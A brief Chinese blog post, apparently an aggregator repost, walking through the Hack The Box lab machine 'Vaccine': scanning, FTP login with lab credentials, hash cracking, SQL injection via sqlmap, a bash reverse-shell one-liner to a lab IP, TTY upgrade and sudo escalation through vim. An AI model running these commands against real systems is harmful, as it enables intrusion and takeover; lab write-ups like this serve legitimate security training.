[渗透测试]HTB靶机-Vaccine

Posted Y4tacker

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[渗透测试]HTB靶机-Vaccine相关的知识,希望对你有一定的参考价值。

文章目录

Vaccine

首先nmap -sC -sV 10.10.10.46

发现前台是一个登陆界面,尝试ftp登录ftpuser / mc@F1l3ZilL4

输入dir拿到源码

尝试下载

通过爆破得到密码741852963

拿到源码


拿到2cb42f8734ea607eefed3b70af13bbd3去尝试md5撞库

成功进入后台

发现存在sql注入


这里很容易猜测到如果是只通过sql那一定是通过udf提权,直接sqlmap一把梭

输入bash -c 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'
反弹shell成功

继续获取tty shell

SHELL=/bin/bash script -q /dev/null

dashboard.php发现了账户密码这个可以查看用户sudo特权指令

目标有python环境,可以直接在获得的shell中直接执行

python3 -c "import pty;pty.spawn('/bin/bash')"

并利用vim中执行shell命令

以上是关于[渗透测试]HTB靶机-Vaccine的主要内容,如果未能解决你的问题,请参考以下文章

[渗透测试]HTB靶机-Shield

[渗透测试]HTB靶机-Oopsie

Vulnhub靶机渗透测试实战:入门DC-1靶机完全渗透

HTB-靶机-Magic

hackthebox(HTB) precious 靶机!

靶机渗透测试-Lazysysadmin